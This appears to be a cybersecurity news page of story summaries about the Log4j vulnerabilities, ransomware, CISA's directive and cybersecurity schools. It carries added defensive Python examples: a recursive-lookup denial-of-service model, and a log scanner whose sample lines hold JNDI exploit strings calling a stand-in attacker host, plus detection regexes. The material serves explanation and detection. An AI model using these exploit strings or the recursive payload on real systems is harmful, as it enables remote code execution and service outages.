More stories

  • Apache releases new 2.17.0 patch for Log4j to solve denial of service vulnerability

    Apache has released Log4j version 2.17.0 after discovering issues with its previous release, 2.16.0, which came out on Tuesday. Apache said version 2.16.0 “does not always protect from infinite recursion in lookup evaluation” and is vulnerable to CVE-2021-45105, a denial of service vulnerability. It rated the severity “high” and gave it a CVSS score of 7.5.

    “Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process. This is also known as a DOS (Denial of Service) attack,” Apache explained. The issue was discovered by Akamai Technologies’ Hideki Okamoto and an anonymous vulnerability researcher.

    Mitigations include upgrading to 2.17.0 and replacing Context Lookups such as ${ctx:loginId} or $${ctx:loginId} in the PatternLayout of the logging configuration with Thread Context Map patterns (%X, %mdc, or %MDC), which copy the MDC value into the log line without evaluating it. Apache also suggested removing references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} from the configuration where the values originate from sources external to the application, such as HTTP headers or user input. Only the log4j-core JAR file is affected by CVE-2021-45105.

    On Friday, security researchers began tweeting about potential issues with 2.16.0, with some identifying the denial of service vulnerability.
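
The recursion the advisory describes, and the %X{...} mitigation, modelled in Python as an added example. This is not Log4j's own code (its substitutor is Java and far more general); it is a toy that handles only the MDC-related parts of a pattern, treats a $${ctx:loginId} from the config as the ${ctx:loginId} it becomes at runtime, and uses Python's RecursionError where the JVM would throw StackOverflowError. The pattern strings and MDC contents are constructed, and the depth-limited variant is a generic defensive pattern, not a description of how 2.17.0 implements its fix.

```python
"""Model of the CVE-2021-45105 lookup recursion and of the %X{...} mitigation.

Added example, not Log4j's own code: a toy re-implementation of two ways a
PatternLayout can pull a value out of the Thread Context Map (MDC). Only the
MDC-related parts of a pattern are handled; %p, %m and the rest are left as-is.
"""
import re

# ${ctx:key}: a Context Lookup. Before 2.17.0 the substituted value was itself
# evaluated for further lookups, so a value that contains a lookup is expanded
# again, and again, ...
CTX_LOOKUP = re.compile(r"\$\{ctx:([^}]*)\}")

# %X{key}: a Thread Context Map pattern converter. The value is copied in
# verbatim and never re-evaluated, which is why Apache recommends it.
MDC_CONVERTER = re.compile(r"%X\{([^}]*)\}")


def render_with_context_lookup(pattern: str, mdc: dict) -> str:
    """Vulnerable rendering: substitute the first ${ctx:key}, then re-evaluate.

    If the MDC value for `key` itself contains ${ctx:key}, every round yields
    a fresh lookup and the recursion never terminates. Python's RecursionError
    stands in here for the JVM's StackOverflowError.
    """
    m = CTX_LOOKUP.search(pattern)
    if m is None:
        return pattern
    value = str(mdc.get(m.group(1), ""))
    expanded = pattern[: m.start()] + value + pattern[m.end():]
    return render_with_context_lookup(expanded, mdc)


def render_with_mdc_converter(pattern: str, mdc: dict) -> str:
    """Mitigated rendering: %X{key} inserts the MDC value literally, in one pass."""
    return MDC_CONVERTER.sub(lambda m: str(mdc.get(m.group(1), "")), pattern)


def render_with_depth_limit(pattern: str, mdc: dict, max_depth: int = 8) -> str:
    """Defensive variant of the lookup: bound the number of substitution rounds
    and emit whatever is left literally. Illustrative only; this is not how
    Log4j 2.17.0 implements its fix.
    """
    for _ in range(max_depth):
        m = CTX_LOOKUP.search(pattern)
        if m is None:
            return pattern
        value = str(mdc.get(m.group(1), ""))
        pattern = pattern[: m.start()] + value + pattern[m.end():]
    return pattern


if __name__ == "__main__":
    layout = "[%p] user=${ctx:loginId} %m"        # constructed, lookup-based layout
    safe_layout = "[%p] user=%X{loginId} %m"      # constructed, converter-based layout
    benign = {"loginId": "alice"}                 # constructed MDC
    hostile = {"loginId": "${ctx:loginId}"}       # constructed, self-referential MDC

    print(render_with_context_lookup(layout, benign))
    print(render_with_mdc_converter(safe_layout, hostile))
    print(render_with_depth_limit(layout, hostile))
    try:
        render_with_context_lookup(layout, hostile)
    except RecursionError:
        print("vulnerable renderer blew the stack, as CVE-2021-45105 describes")
```

The point of the comparison is that the %X converter and the lookup read the same MDC slot; only the lookup hands the attacker-controlled value back to the substitutor, so swapping the converter in removes the recursion without changing what gets logged.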

    Discussion about Log4j has dominated conversation all week. CISA released multiple advisories mandating that US federal civilian agencies apply patches before Christmas, while major tech companies such as IBM, Cisco and VMware have raced to address Log4j vulnerabilities in their products. Security company Blumira claims to have found a new Log4j attack vector that can be exploited through a listening server on a user’s machine or local network, undermining the assumption that the problem was limited to exposed vulnerable servers. Other cybersecurity firms have found that major ransomware groups like Conti are exploring ways to take advantage of the vulnerability.

    Google released a security report on Friday in which Open Source Insights Team members James Wetter and Nicky Ringland said they found that 35,863 of the available Java artifacts from Maven Central depend on the affected Log4j code. That means more than 8% of all packages on Maven Central have at least one version that is impacted by the vulnerability, the two explained. “The average ecosystem impact of advisories affecting Maven Central is 2%, with the median less than 0.1%,” Wetter and Ringland said. So far, nearly 5,000 artifacts have been patched, leaving more than 30,000 still to fix. But the two noted that the issue will be difficult to address because of how deeply Log4j is embedded in some products.
    “Most artifacts that depend on log4j do so indirectly. The deeper the vulnerability is in a dependency chain, the more steps are required for it to be fixed. For greater than 80% of the packages, the vulnerability is more than one level deep, with a majority affected five levels down (and some as many as nine levels down),” Wetter and Ringland wrote. “These packages will require fixes throughout all parts of the tree, starting from the deepest dependencies first.” The two went on to say that, looking at all publicly disclosed critical advisories affecting Maven packages, less than half (48%) of the artifacts affected by a vulnerability have been fixed, meaning it may take years for the Log4j issue to be resolved.
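
The depth-of-dependency point worked through on a small dependency graph, as an added example that is not Google’s Open Source Insights tooling. The graph is constructed: every com.example coordinate is hypothetical, and only org.apache.logging.log4j:log4j-core names a real artifact. It computes how many levels down the vulnerable library sits for each artifact, which artifacts are affected at all, and the order in which they have to release fixed versions (closest to log4j-core first, the top-level application last).

```python
"""How deep a vulnerable library sits in a dependency tree, and the fix order.

Added example, not Google's Open Source Insights tooling. The graph below is
constructed; every com.example coordinate is hypothetical, and only
org.apache.logging.log4j:log4j-core is a real artifact.
"""
from collections import deque

VULNERABLE = "org.apache.logging.log4j:log4j-core"

# artifact -> its direct dependencies (a Maven-style graph, constructed)
GRAPH = {
    "com.example:webapp": ["com.example:service", "com.example:metrics"],
    "com.example:service": ["com.example:common"],
    "com.example:metrics": [VULNERABLE],
    "com.example:common": ["com.example:logging-shim"],
    "com.example:logging-shim": [VULNERABLE],
    VULNERABLE: [],
}


def dependency_depth(graph, root, target):
    """Fewest hops from `root` to `target` (0 if root is the target, None if
    root does not depend on target at all). Breadth-first search."""
    seen = {root}
    queue = deque([(root, 0)])
    while queue:
        node, depth = queue.popleft()
        if node == target:
            return depth
        for dep in graph.get(node, ()):
            if dep not in seen:
                seen.add(dep)
                queue.append((dep, depth + 1))
    return None


def affected_artifacts(graph, target):
    """Every artifact that depends on `target`, directly or transitively."""
    return {a for a in graph if a != target and dependency_depth(graph, a, target) is not None}


def _longest_distance(graph, node, target, memo):
    """Longest path from node to target; None if target is unreachable.
    An artifact can only pick up the fixed library once the artifacts on
    every path below it have, so its longest path is its fix 'wave'."""
    if node == target:
        return 0
    if node in memo:
        return memo[node]
    memo[node] = None  # guards against cycles in a malformed graph
    best = None
    for dep in graph.get(node, ()):
        d = _longest_distance(graph, dep, target, memo)
        if d is not None and (best is None or d + 1 > best):
            best = d + 1
    memo[node] = best
    return best


def fix_order(graph, target):
    """Affected artifacts in the order they have to release a fixed version:
    the ones closest to the vulnerable library first, the application last."""
    memo = {}
    return sorted(affected_artifacts(graph, target),
                  key=lambda a: (_longest_distance(graph, a, target, memo), a))


def share_deeper_than_one(graph, target):
    """Fraction of affected artifacts whose nearest path to the target is
    more than one level deep (the kind of figure the Google analysis reports)."""
    affected = affected_artifacts(graph, target)
    deep = [a for a in affected if dependency_depth(graph, a, target) > 1]
    return len(deep) / len(affected) if affected else 0.0


if __name__ == "__main__":
    for artifact in sorted(affected_artifacts(GRAPH, VULNERABLE)):
        print(f"{artifact}: {dependency_depth(GRAPH, artifact, VULNERABLE)} level(s) deep")
    print("release order:", " -> ".join(fix_order(GRAPH, VULNERABLE)))
    print(f"{share_deeper_than_one(GRAPH, VULNERABLE):.0%} more than one level deep")
```

On a real build the graph would come from the dependency tree your build tool prints, and the two distances differ in what they tell you: the shortest path says how many intermediaries sit between you and the fix, the longest path says how many release cycles have to complete before your own bump is enough.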

  • Best cybersecurity schools and programs

    Are you a career-focused professional searching for the best cybersecurity programs? Discover several of the top colleges and universities with affordable tuition and impressive academic reputations. Consider college and program-specific grants, scholarships, and work-study jobs as well as education awards and other financial aid resources. When selecting the best programs, research each school’s accreditation, recruitment and enrollment efforts, and full-time and part-time graduation and retention rates, along with online degree options.

    Best cybersecurity schools and programs

    The data for this list was collected from the Integrated Postsecondary Education Data System and College Scorecard datasets. While several schools achieved high rankings, the following list draws from a subset of top-rated, regionally accredited schools and historically Black colleges and universities. Rankings were based on many factors such as computer science scholarships, online cybersecurity degree options, and affordable tuition and fees. The data is accurate as of time of publication. Prior to enrollment, prospective students are encouraged to check each school’s website and terms and conditions.

    1. Bentley University
    Bentley University’s cybersecurity risk management certificate offers students and working professionals experience in information security. Prospective students can earn a CompTIA, ISACA, Cloud Security Alliance, or (ISC)2 certification. Students pay $9,900 for the certificate program and prepare for certification exams. The university ranks first for career services and promotes diversity-related initiatives.

    2. Bowie State University
    Bowie State University offers a graduate certificate, bachelor’s, and advanced computer science degrees with a cybersecurity specialization. Students may earn a computer technology bachelor’s degree in alpha and beta testing, cloud computing, and other related specializations. The university is recognized as a National Center of Academic Excellence in Cyber Defense Education and a top five institution for African American technology graduates.

    3. Butler University
    Butler University offers students and working professionals a four-module cyber risk management certificate. This self-paced program is $1,995 and may be completed in 3 to 10 hours. Students will gain program-specific experience in understanding pure risk and cyber risk, identifying third party errors and omissions, and interpreting cyber risk insurance policies along with other relevant industry skills.

    4. Carroll College
    Carroll College offers a free, online three-stage cyber fast track program in which students gain in-depth, foundational knowledge of cybersecurity. Once that is mastered, students proceed to forensics, intrusion detection, and security operations along with system and network penetration testing and application testing. The college awards three Women in Cybersecurity Scholarships to undergraduate and graduate students.

    5. Champlain College Online
    Champlain College offers students an online cybersecurity bachelor’s degree. The program is 120 credit hours and entirely online. Students commit 10 to 17 hours of course study. The college is recognized as a National Center of Academic Excellence in Cyber Defense Education and has ranked among the most affordable online cybersecurity bachelor’s degrees.

    6. Howard University
    Howard University offers a 15 credit hour cybersecurity graduate certificate. This program includes both computer science and engineering coursework. Students complete a year-long cybersecurity course, two technical courses, and a capstone project. Students may select database systems and security, wireless network security, or advanced operating systems and security to satisfy the technical courses.

    7. Kennesaw State University
    Kennesaw State University offers an online cybersecurity bachelor’s and master’s degree. The 30-credit cybersecurity master’s program can be completed within a year. This program is suitable for both career changers and working professionals seeking career advancement. In 2019, the university ranked in the top 50 and 60 for business and information technology and engineering.

    8. North Carolina A&T State University
    North Carolina A&T offers an online, 12-credit hour post-baccalaureate cybersecurity certificate. Prospective students are required to take information privacy and security or advanced security applications along with a computer system security or network security course. For technical courses, students may choose from software security testing, principles of computer networking, and related computer science and technology courses.

    9. University of Illinois at Urbana-Champaign
    The University of Illinois at Urbana-Champaign offers a three course certificate in cybersecurity. Prospective students may compete in an approved cybersecurity competition, serve as an undergraduate researcher, or participate in the Illinois Cyber Security Scholars Program to meet the extracurricular requirement. While completing the certificate program, students attend an Information Trust Institute certificate program meeting.

    10. Virginia Tech
    Virginia Tech offers an online, 12-week cyber bootcamp. Prospective students may enroll in the computer engineering bachelor’s program with a cyber operations track, the cybersecurity management and analytics business degree, or the computer engineering major in networks and cybersecurity. The university offers a CyberCorps Scholarship for Service and master’s programs with cybersecurity tracks.

  • Log4j: Conti ransomware attacking VMware servers and TellYouThePass ransomware hits China

    Researchers with security firm Advanced Intelligence (AdvIntel) have discovered the Conti ransomware group exploiting VMware vCenter Server instances through the Log4j vulnerabilities. In a report on Friday, the company said it discovered multiple members of Conti discussing ways to take advantage of the Log4j issue, making Conti the first sophisticated ransomware group spotted trying to weaponize the vulnerability. AdvIntel said the current exploitation “led to multiple use cases through which the Conti group tested the possibilities of utilizing the Log4J2 exploit.”

    “Most importantly, AdvIntel confirmed that the criminals pursued targeting specific vulnerable Log4J2 VMware vCenter for lateral movement directly from the compromised network resulting in vCenter access affecting US and European victim networks from the pre-existent Cobalt Strike sessions,” the researchers said. Their research of ransomware logs shows Conti made over $150 million in the last six months.

    AdvIntel laid out a timeline of Conti’s interest in Log4j, starting on November 1, when the group sought new attack vectors. Throughout November, Conti redesigned its infrastructure as it sought to expand, and by December 12 it had identified Log4Shell as a possibility. By December 15, it had begun actively targeting vCenter networks for lateral movement.
    In a statement, VMware said it has issued a security advisory with fixes for the 40 of its products that are vulnerable to the Log4j issue, including vCenter. The advisory confirms that exploitation attempts have been seen in the wild.

    “Any service connected to the internet and not yet patched for the Log4j vulnerability (CVE-2021-44228) is vulnerable to hackers, and VMware strongly recommends immediate patching for Log4j,” VMware said.

    AdvIntel added that it is only a matter of time until Conti and other groups begin exploiting Log4j to its full capacity. Khonsari was the first ransomware family seen targeting Log4j, but it was considered low-grade and did not even have a viable ransom note, leading some to consider it simply a wiper. Researchers in China have identified the TellYouThePass ransomware being used in attacks against Windows and Linux devices via the Log4j issue. Recorded Future ransomware expert Allan Liska said the latest news about ransomware groups exploring Log4j lined up with what he is seeing. “IABs working with Conti have started scanning for Log4Shell and likely have exploited victims. BUT we have not seen any evidence of a successful ransomware attack resulting from these scans yet. Doesn’t mean it hasn’t happened, just we haven’t seen it,” Liska said.

  • Ransomware affects the entire retail supply chain this holiday season

    US online holiday sales grew by 30% in 2020, and Forrester forecasts another 10% year-over-year growth in 2021. This growth raises the stakes for retail professionals who must support the increased demand, and it makes them a prime target for ransomware attackers.

    Why should retailers pay attention to ransomware preparedness?

    Ransomware attackers target organizations that need as close to 100% uptime as possible, since those businesses feel the effects of an attack more acutely and are more likely to pay a ransom quickly. Retailers and their providers fall right into this bucket: they rely on continuously running production, they must serve consumers constantly, and they often use just-in-time manufacturing. They also have several third-party dependencies they cannot afford to disappoint and complex supply chains to manage. Every aspect of the retail supply chain is a potential target. Since the holiday season guarantees retailers more traffic and more emotionally charged purchases, the incentive for ransomware groups to attack them is greater now than at any other time of year. Below, we provide a primer on ransomware attacks and how they can affect retailers.

    What is ransomware?

    Ransomware is a type of malicious software designed to block access to a computer system until a sum of money is paid. It has been used in very public attacks, like the one on Colonial Pipeline earlier this year, and in attacks on hospital systems. This type of attack has become more common in part because of the emergence of ransomware-as-a-service (RaaS), in which attackers sell access to ransomware as though they were running a business, fully outfitted with salespeople, developers, managers, and marketers. They operate like a typical startup and sell access to their “product” on the dark web to cybercriminals who do not want to develop their own ransomware but still want the payout.
    How does ransomware affect retailers?

    Ransomware attacks affect every aspect of the retail supply chain, especially in five areas: suppliers, logistics, operations, products, and websites. Below are descriptions of how ransomware can affect each of these, with real-world examples.

    Suppliers

    When ransomware attackers target suppliers, the result is often factory machines being disabled or employees being locked out of critical supply systems. Once a supplier discovers a ransomware attack, the de facto response to contain it is to shut down facility operations indefinitely. This creates production bottlenecks, and customers scramble to use an alternative supplier. This kind of attack struck JBS Foods this year, shutting down its slaughterhouse for an entire day. To add insult to injury, JBS paid $11 million in Bitcoin ransom to get its systems back. To gauge the resilience of your suppliers in a crisis, we recommend using the Forrester Supplier Resilience Assessment Tool.

    Logistics

    Logistics firms are targeted because of their just-in-time business models and the complex interconnectedness of their IT systems. Ransomware spreads quickly through these networks to encrypt as many devices as possible and render the firm inoperable. This happened over the past few years to CMA CGM, FedEx, and Maersk, which all halted operations and lost millions in revenue.

    Operations

    When ransomware infiltrates a brick-and-mortar store, it tries to infect point-of-sale systems, employee tools, store printers, whatever it can reach. These attacks can prevent customer transactions or even force stores to close. More damaging for the brand is the risk that customers witness an attack unravel your operations in real time: Cencosud learned of a ransomware attack on its systems when POS printers in its stores spewed out ransom notes.

    Products

    Digital products such as e-readers, tablets, and video gaming systems are also susceptible to ransomware attacks. When hit, these devices may appear inoperable while the attacker steals company and customer data. This can be very damaging for customers and organizations alike. When devices mysteriously stop working, customers take to social media to air their grievances, which affects the brand’s image and public perception of the product. When Barnes & Noble’s NOOK e-reader was hit by ransomware, customers lost access to their libraries, purchases, and accounts, and complained on Facebook and Twitter as a result.

    Websites

    Ransomware attackers often target public assets, especially the ones retailers rely on most, like e-commerce websites. If your website goes down from a ransomware attack, customers lose access to you, which may confuse or frustrate them and leave them worried about the safety of their data. Last year, X-Cart’s e-commerce hosting site was hit, locking store owners out of their own websites and preventing customers from reaching them for days.

    How can you protect against ransomware attacks this holiday season?

    Protecting against ransomware is something every employee can take part in. Both during the holiday season and as you plan your 2022 operations, the top three things we recommend to promote ransomware defenses among your employees are:

    1. Keep your team informed about the implications of a ransomware attack, especially around high-traffic times like the holidays. Make sure they know what ransomware is and are on the lookout for signs of a potential attack.
    2. Get your employees to gamify finding phishing attacks and reporting them to your security team. Phishing is one of the main ways cybercriminals start their attacks, so the more awareness you can spread about this vector, the better.
    3. Work with the security team to simulate what you would do in the event of a ransomware attack. Having a plan for how to respond when an attack happens is critical to a quick and complete recovery.
    This blog post is part of Forrester’s holiday 2021 series. It was written by Forrester analyst Allie Mellen and was originally published by Forrester.

  • Security firm Blumira discovers major new Log4j attack vector

    It doesn’t rain, but it pours. Previously, one assumption about the Log4j security vulnerability, which scores a maximum 10 out of 10 on the CVSS scale, was that it was limited to exposed vulnerable servers. We were wrong. The security company Blumira claims to have found a new Log4j attack vector.


    You didn’t really want to take this weekend off, did you? Of course not! Instead, you’ll be chasing vulnerable Log4j code ever deeper into your network. According to Blumira, the newly discovered vector uses a JavaScript WebSocket connection to reach a listening server on the victim’s own machine or local network. A user simply has to navigate to a web page to trigger the vulnerability. Adding insult to injury, WebSocket connections within the host are hard to get deep visibility into, which makes attacks using this vector even harder to detect.

    This vector significantly expands the attack surface. How much so? It can be used against services running on localhost that are not exposed to the network at all. This is what we like to call a “shoot me now” kind of problem. Oh, and did I mention? The user has no direct control over WebSocket connections: they can start silently when a web page loads. Don’t you love the word “silently” in this context? I know I do.

    WebSockets, for those of you who aren’t web developers, are supported by almost all modern browsers. They’re commonly used for two-way communication such as website chat and alerts, passing timely information to the browser and letting the browser quickly send data back. However, WebSockets have their own security risks. They aren’t restricted by the same-origin policy the way a normal cross-domain HTTP request is; instead, they rely on the web server to validate the request’s Origin header. In short, they don’t come with much in the way of built-in security. As you’d guess, WebSockets have been used in attacks before: they have been used to attack cable modems with malicious requests, and hackers use them for host fingerprinting and port scanning.

    In its proof-of-concept attack, Blumira used one of the many Java Naming and Directory Interface (JNDI) exploit strings, delivered in a request path over a WebSocket connection, to trigger the vulnerability on a machine running a vulnerable Log4j2 library. All that was needed was a path request started on page load. Simple, but deadly. Making matters worse, the target doesn’t need to be localhost: WebSockets allow connections to any IP. Let me repeat, “any IP”, and that includes private IP space.

    As the page loads, it initiates a local WebSocket connection, hits the vulnerable listening server, and connects out over the type of connection named in the JNDI connection string. The researchers saw the most success with Java Remote Method Invocation (RMI), default port 1099, although custom ports are often used. Simple port scanning, a technique already in the WebSocket hacker handbook, was the easiest path to a successful attack. Making detection harder still, the company found that “specific patterns should not be expected as it is easy to trigger traffic passively in the background.” Once an open port to a local service, or to a service reachable from the host, is found, the attacker can drop the JNDI exploit string in the path or parameters. “When this happens, the vulnerable host calls out to the exploit server, loads the attacker’s class, and executes it with java.exe as the parent process.” Then the attacker can run whatever they want.

    Indeed, they already are. As Anurag Gurtu, StrikeReady’s chief product officer, observed, “Apparently, a ransomware attack is currently exploiting the Log4Shell vulnerability. It’s the Khonsari ransomware gang that has built an attack using C# and the .NET framework. After execution, the malware enumerates all mounted drives (other than C:/) and targets user directories including Documents, Videos, Pictures, Downloads, and Desktop.
    An AES 128 CBC algorithm is used for encryption, and the files are saved with a .khonsari extension.” They’re not the only ones. State-sponsored hackers from China, Iran, North Korea, and Turkey, operators deploying Cobalt Strike, and many others are also exploiting Log4j vulnerabilities. This latest vector simply opens the doors even wider for would-be attackers.

    It will only get worse before it gets better. As Sophos senior threat researcher Sean Gallagher recently explained, to date Log4Shell attackers have focused on cryptomining, but this is just a “lull before the storm.” He continued, “We expect adversaries are likely grabbing as much access to whatever they can get right now… to monetize and/or capitalize on it later on. The most immediate priority for defenders is to reduce exposure by patching and mitigating all corners of their infrastructure and investigate exposed and potentially compromised systems.” After all, Gallagher concluded, “This vulnerability can be everywhere.”

    What can you do about this? Blumira suggests the following:

    • Update all local development efforts, internal applications, and internet-facing environments to Log4j 2.16 as soon as possible, before threat actors can weaponize this exploit further (Apache has since released 2.17.0, which also addresses the denial of service bug in 2.16.0). This includes moving any custom applications to 2.16 in their dependency manifests to avoid incidental exploitation.
    • Look closely at your network firewall and egress filtering. The goal is to block the callback the exploit needs in order to land; significantly limiting the egress traffic of your endpoints reduces the risk while you patch your applications. In particular, make sure that only specific machines can send outbound traffic on ports 53 (DNS), 389 and 636 (LDAP and LDAPS) and 1099 (RMI); all other ports should be blocked.
    • Since weaponized Log4j payloads often call back to their operators over random high ports, block outbound access to those ports as well.
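
The two halves of that advice, the JNDI lookup string landing in a path, parameter or header and the outbound callback it needs on 53, 389, 636 or 1099, as an added example that is not Blumira’s or Sophos’s tooling. The access-log lines, the 10.0.0.x addresses, evil.example and the egress policy are all constructed. It goes slightly beyond the article in one respect: it also unwraps the ${lower:x}/${upper:x} nesting attackers use to hide the literal “jndi” from naive filters, and URL-decodes the request path before matching.

```python
"""Find JNDI lookup strings in web request logs and check the callback they need.

Added example, not Blumira's or Sophos's tooling. The log lines, the server
address, the egress policy and every host name in them are constructed. It
also unwraps the ${lower:x}/${upper:x} nesting used to hide the literal "jndi".
"""
import re
from urllib.parse import unquote

# ${lower:j}ndi -> jndi ; applied repeatedly so nested wrappers collapse too
NESTED = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)

# ${jndi:<scheme>://<host>[:<port>]/...}
JNDI = re.compile(
    r"\$\{jndi:(ldaps?|rmi|dns)://([^/:\s}]+)(?::(\d+))?[^}]*\}", re.IGNORECASE
)

# Ports the article singles out for egress filtering, keyed by JNDI scheme.
DEFAULT_PORTS = {"dns": 53, "ldap": 389, "ldaps": 636, "rmi": 1099}

SERVER_HOST = "10.0.0.10"  # the host running the vulnerable Log4j (constructed)

# {destination port: hosts allowed to send outbound traffic on it}; any port
# not listed is blocked for everyone ("all other ports should be blocked").
EGRESS_POLICY = {
    53: {"10.0.0.2"},
    389: {SERVER_HOST},
    636: {SERVER_HOST},   # the web tier talks LDAPS to an internal directory
    1099: set(),
}

# Constructed access-log lines in combined format; evil.example is hypothetical.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [17/Dec/2021:10:01:03 +0000] "GET /login?user=${jndi:ldap://evil.example:1389/a} HTTP/1.1" 200 64 "-" "curl/7.79"',
    '10.0.0.9 - - [17/Dec/2021:10:01:04 +0000] "GET / HTTP/1.1" 200 64 "-" "${${lower:j}ndi:rmi://10.0.0.66/x}"',
    '10.0.0.9 - - [17/Dec/2021:10:01:05 +0000] "GET /%24%7Bjndi%3Aldaps%3A%2F%2Fevil.example%2Fz%7D HTTP/1.1" 404 0 "-" "-"',
]


def normalize(text: str) -> str:
    """URL-decode and strip ${lower:..}/${upper:..} wrappers until stable."""
    text = unquote(text)
    previous = None
    while previous != text:
        previous = text
        text = NESTED.sub(lambda m: m.group(1), text)
    return text


def find_lookups(line: str):
    """(scheme, host, port) for every JNDI lookup string in one log line."""
    found = []
    for m in JNDI.finditer(normalize(line)):
        scheme = m.group(1).lower()
        port = int(m.group(3)) if m.group(3) else DEFAULT_PORTS[scheme]
        found.append((scheme, m.group(2), port))
    return found


def egress_permitted(src_host: str, dst_port: int, policy: dict) -> bool:
    """Would the policy let src_host open an outbound connection to dst_port?"""
    return src_host in policy.get(dst_port, set())


def triage(lines, server_host: str, policy: dict):
    """One finding per lookup string: who sent it, where the vulnerable host
    would call back to, and whether the egress policy would let that out."""
    findings = []
    for line in lines:
        client = line.split(" ", 1)[0]
        for scheme, host, port in find_lookups(line):
            findings.append({
                "client": client,
                "scheme": scheme,
                "callback": f"{host}:{port}",
                "egress_permitted": egress_permitted(server_host, port, policy),
            })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG, SERVER_HOST, EGRESS_POLICY):
        verdict = "WOULD REACH ATTACKER" if f["egress_permitted"] else "blocked by egress policy"
        print(f'{f["client"]} -> {f["scheme"]}://{f["callback"]}: {verdict}')
```

The third finding is the caveat: a port-based allowlist that lets the web tier speak LDAPS to an internal directory also lets it speak LDAPS to an attacker on 636, so the egress rule has to pin destinations as well as ports, or the callback still lands.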
    Good luck, get back to work hunting down Log4j libraries and calls, and hope you can batten down as much of your infrastructure as possible before the holidays.

  • CISA: Federal agencies must immediately mitigate Log4J vulnerabilities

    The Cybersecurity and Infrastructure Security Agency (CISA) issued an emergency directive on Friday requiring federal civilian departments and agencies to immediately patch their internet-facing network assets for the Apache Log4j vulnerabilities. Where they cannot patch, they are required to implement other appropriate mitigation measures. CISA had previously said federal civilian agencies would have until December 24 to address the issue, but it noted that the latest directive “is in response to the active exploitation by multiple threat actors of vulnerabilities found in the widely used Java-based logging package Log4j.”


    CISA Director Jen Easterly said the agency is urging organizations of all sizes to assess their network security and adopt the mitigation measures outlined in the emergency directive. If you are using a vulnerable product on your network, Easterly said, you should consider your door wide open to any number of threats. “The Log4j vulnerabilities pose an unacceptable risk to federal network security,” Easterly explained. “CISA has issued this emergency directive to drive federal civilian agencies to take action now to protect their networks, focusing first on internet-facing devices that pose the greatest immediate risk.” According to CISA, the directive was issued because these vulnerabilities are currently being exploited by threat actors, and CISA’s investigations showed how prevalent the affected software is across the federal enterprise. CISA said there is a “high potential” for compromise of agency information systems and expressed concern about the impact of a breach.

    VMware head of cybersecurity strategy Tom Kellermann said exploitation of the Log4j vulnerability gives an attacker full control of the target system running the vulnerable library. “So they have the capacity to just be on missions and spy on the activities of the users of the systems. They have the capacity to use that system to island-hop into other systems. They have the capacity to become disruptive. It really varies,” said Kellermann, who served as a cybersecurity commissioner for the Obama administration. “I would say that there is so much activity going on right now, that it’ll probably be weeks, if not months, before the true scope of this significant cybercrime wave for this vulnerability and the severity of its impact is discovered.”

    CISA created a dedicated webpage with Log4j mitigation guidance and resources for network defenders, as well as a community-sourced GitHub repository of affected devices and services. CISA also added the Log4j vulnerability, alongside 12 others, to its Known Exploited Vulnerabilities Catalog, a list it created last month to give government organizations a catalog of vulnerabilities known to be under active exploitation.

    Using its honeypot network to attract attackers, cybersecurity firm Bitdefender found that its honeypots were attacked 36,000 times from Dec. 9 to Dec. 16. Half of all attacks used Tor to mask their true country of origin; based on endpoint telemetry, the leading apparent countries of origin were Germany at 34% and the US at 26%. Bitdefender added that, also based on endpoint telemetry, the leading targets were the US at 48%, followed by the UK and Canada, both at 8%.

  • Google unleashes security 'fuzzer' on Log4Shell bug in open source software

    The remotely exploitable flaw in Log4j, the widely deployed Java error logging library, is being attacked by multiple actors and will likely remain so for many months as open-source projects, product vendors, and end-user organisations patch affected systems. Google is now adding OSS-Fuzz to the pool of answers to the internet-wide Log4j flaw, also known as Log4Shell. The bug is tracked as CVE-2021-44228 and was partially fixed in the Apache Software Foundation’s release of Log4j version 2.15.0 last week. OSS-Fuzz is Google’s free service for fuzzing open-source software projects and is currently used by over 500 critical projects. Fuzzing feeds large volumes of random or malformed input to software to provoke errors such as crashes and so uncover potential security flaws.

    To seek out Log4Shell-style weaknesses in newly built open-source software, Google is partnering with security firm Code Intelligence to provide continuous fuzzing for Log4j. Code Intelligence makes Jazzer, an open-source fuzzing engine that is now part of OSS-Fuzz and has been modified to identify Log4j-style vulnerabilities in code under development. Google awarded Code Intelligence $25,000 for its work on the Log4j fuzzing. “Since Jazzer is part of OSS-Fuzz, all integrated open-source projects written in Java and other JVM-based languages are now continuously searched for similar vulnerabilities,” Code Intelligence notes in a press release. Jazzer can also detect when the code under test performs a remote JNDI lookup, which is the behaviour Log4Shell abuses.

    JNDI (Java Naming and Directory Interface) is a Java API for looking up objects in naming and directory services, LDAP servers among them, and the Log4j flaw lies in the library’s lookup feature, which resolves JNDI references embedded in logged strings. As Cisco’s Talos researchers explain, the flaw lets a remote attacker make a pre-2.15 version of Log4j issue an LDAP request to a server the attacker controls, retrieve a payload from it and execute that payload locally on the vulnerable device. Apache this week released Log4j version 2.16.0 to fix a second related JNDI flaw, tracked as CVE-2021-45046, which Apache described at the time as allowing an attacker to craft data patterns in a JNDI message lookup and cause a denial of service (DoS). Log4j 2.15.0 had restricted JNDI to the java, ldap and ldaps protocols; 2.16.0 disables JNDI lookups entirely by default. Disabling JNDI was previously a manual mitigation step against the original flaw.

    Most efforts are now focussed on vendors updating Log4j in their products and end-user organisations applying updates as they become available. For example, the US Cybersecurity and Infrastructure Security Agency (CISA) has given federal agencies until 24 December to identify all applications affected by Log4Shell. Cisco, VMware, IBM and Oracle are busy developing patches for their affected products.

    Google’s OSS-Fuzz tackles Log4j from another angle, aiming to prevent developers from accidentally inserting the flaw into new software projects that may eventually be deployed in production. “Vulnerabilities like Log4Shell are an eye-opener for the industry in terms of new attack vectors. With OSS-Fuzz and Jazzer, we can now detect this class of vulnerability so that they can be fixed before they become a problem in production code,” says Jonathan Metzman from the Google Open Source Security Team.

  • Android malware warning: Over 500,000 users have been infected after downloading this app from Google Play

